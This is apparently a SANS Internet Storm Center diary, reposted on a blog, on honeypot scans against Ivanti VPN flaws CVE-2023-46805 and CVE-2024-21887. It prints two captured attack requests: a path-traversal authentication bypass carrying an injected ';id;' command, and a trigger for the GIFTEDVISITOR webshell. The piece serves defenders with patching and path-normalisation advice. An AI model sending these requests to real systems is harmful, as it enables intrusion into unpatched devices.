Ivanti products have given us a rich corpus of vulnerabilities in recent months (years). Of course, we do see occasional scans attempting to exploit them. Just today, I spotted two of them. None of them is particularly new, but a reminder to keep patching (or disabling):
CVE-2023-46805 and CVE-2024-21887 “tests”
POST /api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection HTTP/1.1
Host: [honeypot IP address]:9001
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 16
Content-Type: application/json
{“type”: “;id;”}
This is a very typical authentication or access control bypass taking advantage of a directory traversal vulnerability. The first part of the URL, “/api/v1/totp/user-backup-code/” is accessible by anybody as it may be used as part of the authentication process. This URL “masks” the latter half that points to confidential information. Always normalize your paths before applying access control rules.
The purpose of the exploit is to detect if your system is vulnerable. This will not cause any “damage” aside from leaking information if you are vulnerable. However, the more severe issue is that an actual exploit attempt will likely follow it up.
POST /api/v1/cav/client/visits HTTP/1.1
Host: [honeypot IP address]:5986
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Connection: close
Content-Length: 13
Accept: */*
Accept-Language: en
Content-Type: text/xml
Accept-Encoding: gzip
GIFTEDVISITOR
Another exploit taking advantage of the two vulnerabilities mentioned above. This request attempts to trigger a webshell that Volexity calls “GIFTEDVISITOR” based on the string used to trigger it. Volexity wrote about this back in January [1]. It’s sad that attackers still think it is worthwhile scanning for this.
[1] https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/
—
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Discover more from Cyber GRC Hive
Subscribe to get the latest posts sent to your email.